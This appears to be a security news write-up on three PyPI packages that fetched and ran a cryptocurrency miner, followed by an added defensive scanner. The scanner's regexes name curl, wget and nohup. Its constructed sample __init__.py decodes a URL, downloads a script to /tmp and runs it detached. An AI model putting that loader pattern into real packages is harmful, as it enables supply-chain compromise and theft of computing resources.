Hackers exploit PyPI to steal developers’ computing resources

Three malicious packages were recently discovered in the open PyPI repository that deploy a cryptocurrency miner on infected Linux devices. The packages, named “modularseven”, “driftme” and “catme”, caught the attention of security researchers after being downloaded 431 times in the month before they were removed from the site.

Gabby Xiong, a researcher at Fortinet, reported that on first use these packages deploy a CoinMiner executable on Linux devices. The malicious code lives in the package’s __init__.py file, which decodes and retrieves the first stage, a shell script (“unmi.sh”), from a remote server; that script in turn downloads a mining configuration file and the CoinMiner binary, both hosted on GitLab.

The ELF binary is then executed in the background with the nohup command, so the process keeps running after the user’s session ends.

Xiong notes that these packages, like “CultureStreak” from an earlier, similar campaign, conceal their payload by hosting it on a remote server, which reduces the chance that the malicious code is detected inside the package itself.
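Because the miner itself is fetched at run time, a scan of the package contents will not find it; what does remain in the package is the loader shape the write-up describes: an __init__.py that decodes an embedded blob, fetches something from a remote URL, and launches a process detached with nohup. As an added example (not Fortinet’s code and not taken from any of the packages), the following Python heuristic flags module sources that combine those traits. The two module sources, the placeholder blob and the names `scan_source`, `scan_package_dir`, `Finding` and the indicator labels are all constructed for this illustration.

```python
"""Heuristic scanner for the __init__.py loader pattern described above.

Added example: flags Python module sources that (a) decode an embedded blob,
(b) fetch from a remote URL and (c) launch a detached process. The regexes
are intentionally simple; treat a hit as a review prompt, not a verdict.
"""
from __future__ import annotations

import re
import textwrap
from dataclasses import dataclass, field
from pathlib import Path

# Each indicator is a regex applied to one line of *source text* (nothing is executed).
INDICATORS: dict[str, re.Pattern[str]] = {
    "decode": re.compile(r"\b(base64\.b64decode|codecs\.decode|zlib\.decompress)\s*\("),
    "remote_fetch": re.compile(r"\b(urllib\.request\.urlopen|requests\.get|urlopen)\s*\(|\b(curl|wget)\s"),
    "shell_exec": re.compile(r"\b(os\.system|subprocess\.(run|Popen|call))\s*\("),
    "detached": re.compile(r"\bnohup\b|\bsetsid\b|&\s*$", re.MULTILINE),
    "drop_and_chmod": re.compile(r"/tmp/|chmod\s+[+\d]*x|os\.chmod\("),
}


@dataclass
class Finding:
    path: str
    hits: dict[str, list[int]] = field(default_factory=dict)  # indicator -> line numbers

    @property
    def score(self) -> int:
        return len(self.hits)

    @property
    def suspicious(self) -> bool:
        # Decode + remote fetch + detached execution is the loader shape from the article.
        return {"decode", "remote_fetch", "detached"} <= set(self.hits)


def scan_source(path: str, source: str) -> Finding:
    """Scan one module's source text and record which indicators fired on which lines."""
    finding = Finding(path)
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                finding.hits.setdefault(name, []).append(lineno)
    return finding


def scan_package_dir(root: Path) -> list[Finding]:
    """Scan every __init__.py below root (an unpacked sdist, wheel or site-packages tree)."""
    return [scan_source(str(p), p.read_text(errors="replace"))
            for p in sorted(root.rglob("__init__.py"))]


# Constructed sample: an ordinary package entry point.
BENIGN_INIT = textwrap.dedent("""\
    from .core import Client
    __all__ = ["Client"]
    __version__ = "1.0.0"
    """)

# Constructed sample of the loader shape: decode, fetch, drop to /tmp, run detached.
# The blob is a placeholder string, not a real encoded URL.
SUSPICIOUS_INIT = textwrap.dedent("""\
    import base64, os, urllib.request
    _blob = "PLACEHOLDER-BASE64-BLOB"  # constructed placeholder
    _url = base64.b64decode(_blob).decode()
    _script = urllib.request.urlopen(_url).read()
    open("/tmp/.stage.sh", "wb").write(_script)
    os.system("nohup sh /tmp/.stage.sh >/dev/null 2>&1 &")
    """)


def report(finding: Finding) -> str:
    """One-line summary suitable for a CI log."""
    verdict = "SUSPICIOUS" if finding.suspicious else "ok"
    detail = ", ".join(f"{k}@{v}" for k, v in sorted(finding.hits.items()))
    return f"{finding.path}: {verdict} (score {finding.score}) {detail}".rstrip()


if __name__ == "__main__":
    for name, src in (("benign/__init__.py", BENIGN_INIT), ("loader/__init__.py", SUSPICIOUS_INIT)):
        print(report(scan_source(name, src)))
```

Running the module scans the two constructed samples; to scan a real download, unpack it and call `scan_package_dir(Path("unpacked"))`. The `suspicious` property deliberately requires all three of decode, remote fetch and detached execution, since any one of them alone is common in legitimate code.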

